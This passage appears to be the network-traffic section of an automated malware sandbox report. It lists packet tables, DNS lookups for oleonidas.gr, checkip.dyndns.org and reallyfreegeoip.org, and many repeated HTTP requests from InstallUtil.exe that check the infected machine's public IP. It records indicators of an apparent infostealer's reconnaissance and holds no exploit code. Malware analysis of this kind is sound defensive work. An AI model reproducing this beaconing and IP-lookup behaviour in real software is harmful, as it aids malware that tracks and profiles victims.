                                                            Nov 8, 2024 11:51:47.839627028 CET8049818193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:47.839685917 CET4981880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:47.840274096 CET8049831193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:47.840336084 CET4983180192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:47.840441942 CET4983180192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:47.845459938 CET8049831193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:49.617852926 CET8049831193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:49.619780064 CET49842443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:49.619808912 CET44349842188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:49.619954109 CET49842443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:49.620147943 CET49842443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:49.620157003 CET44349842188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:49.667449951 CET4983180192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:50.224231958 CET44349842188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:50.226130962 CET49842443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:50.226149082 CET44349842188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:50.363720894 CET44349842188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:50.363974094 CET44349842188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:50.364078045 CET49842443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:50.364598036 CET49842443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:52:26.417186022 CET8049708193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:52:26.417303085 CET4970880192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:52:37.580107927 CET8049724193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:52:37.580173016 CET4972480192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:52:37.582273960 CET8049724193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:52:37.582315922 CET4972480192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:52:45.165266991 CET8049776193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:52:45.165321112 CET4977680192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:52:54.739090919 CET8049831193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:52:54.741977930 CET4983180192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:53:12.153914928 CET4972480192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:53:12.158880949 CET8049724193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:53:29.620829105 CET4983180192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:53:29.625828981 CET8049831193.122.6.168192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 8, 2024 11:51:10.357927084 CET5331553192.168.2.51.1.1.1
                                                            Nov 8, 2024 11:51:10.495960951 CET53533151.1.1.1192.168.2.5
                                                            Nov 8, 2024 11:51:16.676836967 CET6305253192.168.2.51.1.1.1
                                                            Nov 8, 2024 11:51:16.908659935 CET53630521.1.1.1192.168.2.5
                                                            Nov 8, 2024 11:51:18.096364021 CET5468753192.168.2.51.1.1.1
                                                            Nov 8, 2024 11:51:18.105474949 CET53546871.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 8, 2024 11:51:10.357927084 CET192.168.2.51.1.1.10xd85bStandard query (0)www.oleonidas.grA (IP address)IN (0x0001)false
                                                            Nov 8, 2024 11:51:16.676836967 CET192.168.2.51.1.1.10x2f3cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                            Nov 8, 2024 11:51:18.096364021 CET192.168.2.51.1.1.10x79bcStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 8, 2024 11:51:10.495960951 CET1.1.1.1192.168.2.50xd85bNo error (0)www.oleonidas.groleonidas.grCNAME (Canonical name)IN (0x0001)false
                                                            Nov 8, 2024 11:51:10.495960951 CET1.1.1.1192.168.2.50xd85bNo error (0)oleonidas.gr185.78.221.73A (IP address)IN (0x0001)false
                                                            Nov 8, 2024 11:51:16.908659935 CET1.1.1.1192.168.2.50x2f3cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                            Nov 8, 2024 11:51:16.908659935 CET1.1.1.1192.168.2.50x2f3cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                            Nov 8, 2024 11:51:16.908659935 CET1.1.1.1192.168.2.50x2f3cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                            Nov 8, 2024 11:51:16.908659935 CET1.1.1.1192.168.2.50x2f3cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                            Nov 8, 2024 11:51:16.908659935 CET1.1.1.1192.168.2.50x2f3cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                            Nov 8, 2024 11:51:16.908659935 CET1.1.1.1192.168.2.50x2f3cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                            Nov 8, 2024 11:51:18.105474949 CET1.1.1.1192.168.2.50x79bcNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                            Nov 8, 2024 11:51:18.105474949 CET1.1.1.1192.168.2.50x79bcNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.oleonidas.gr
                                                            • reallyfreegeoip.org
                                                            • checkip.dyndns.org

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549705193.122.6.16880360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:16.920197964 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:17.763024092 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 334a490ad260327979edcdfd1def81e1
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                                                            Nov 8, 2024 11:51:17.800525904 CET127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 8, 2024 11:51:18.049206972 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1c396028f0adc8a7ea360359325a0f9c
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                                                            Nov 8, 2024 11:51:19.100511074 CET127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 8, 2024 11:51:19.350430965 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:19 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: afe94d57159cd598952cd54c9f53afec
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549708193.122.6.16880360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:20.153701067 CET127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 8, 2024 11:51:21.291215897 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 68b6595f5d09befe09a08c49d1cf6807
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549710193.122.6.16880360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:22.065687895 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:22.936543941 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: c75841dbd51539538e279a09769d9937
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549712193.122.6.16880360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:24.027800083 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:24.999398947 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1899db07fc706f8dc57b4a4ffdba4fe5
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549714193.122.6.16880360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:25.764219999 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:27.276596069 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: c1692b4f29b87614e8a6c2be4a4faf9c
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549718193.122.6.16880360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:28.330817938 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:29.174837112 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:29 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 5d853b323f37b9ca28754d62c63e1652
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549724193.122.6.16880360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:29.970535994 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:32.140141010 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 81422fd0b54ecdaa8a310898410e27b7
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549758193.122.6.168803652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:36.213725090 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:37.082256079 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:36 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 8926b44e4b2cfbe0fec3cdee98463e0b
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                                                            Nov 8, 2024 11:51:37.086359978 CET127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 8, 2024 11:51:37.336745977 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 6e8da9d3ef3995a643ec23d92a124b71
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                                                            Nov 8, 2024 11:51:38.181536913 CET127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 8, 2024 11:51:38.431886911 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:38 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 14d59a826eb9f7e5a14fefe60dad1887
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549776193.122.6.168803652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:39.189116001 CET127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 8, 2024 11:51:40.044169903 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: aa4eb903808c5ea483a08811dd34d3a6
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.549787193.122.6.168803652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:40.842951059 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:41.689235926 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 2b596ef8ba6960730e002fb9c8e503b6
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.549796193.122.6.168803652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:42.459095955 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:43.308401108 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 6215f2b5aa47f5f75bbd6850143e34fa
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.549808193.122.6.168803652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:44.090014935 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:44.933744907 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 245a5c120dddbf4c1c4b9d89c984bd14
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.549818193.122.6.168803652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:45.693754911 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:47.073690891 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: b8cdb979e044ca50b285f2a61a1c9749
